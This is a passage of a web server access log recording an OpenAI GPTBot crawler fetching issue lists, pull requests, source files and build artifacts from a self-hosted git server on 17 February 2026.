+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10114] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 11182] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 12005] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode" +[17/Feb/2026:17:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11914] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11915] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13919] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" +[17/Feb/2026:17:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9969] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=oldest&state=all&type=all" +[17/Feb/2026:17:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe?display=rendered" [Client 74.7.227.38] [Length 10866] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:17:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=all&type=all" +[17/Feb/2026:17:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=oldest&state=all&type=all" +[17/Feb/2026:17:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:17:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe?display=rendered" [Client 74.7.227.38] [Length 10835] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:17:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:17:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" [Client 74.7.227.38] [Length 740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/.vscode/tasks.json" +[17/Feb/2026:17:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 10984] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11369] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:17:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33684] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=oldest&state=all&type=all" +[17/Feb/2026:17:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33700] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:17:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:17:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11138] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33389] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33695] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11130] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33682] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11141] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11137] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11145] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11131] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33393] [Gzip 10.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33694] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11133] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=source" [Client 74.7.227.38] [Length 33688] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=source" [Client 74.7.227.38] [Length 33389] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:17:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/labels?sort=mostissues&state=" [Client 74.7.227.38] [Length 7655] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/labels" +[17/Feb/2026:17:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:17:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:17:35:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:35:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/js/script.js" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9946] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:17:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest/main.py" +[17/Feb/2026:17:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 11071] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:17:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json?display=source" [Client 74.7.227.38] [Length 37585] [Gzip 11.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.assets.json" +[17/Feb/2026:17:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/PostgresPatrol.spec" [Client 74.7.227.38] [Length 12487] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol" +[17/Feb/2026:17:35:38 +0000] - 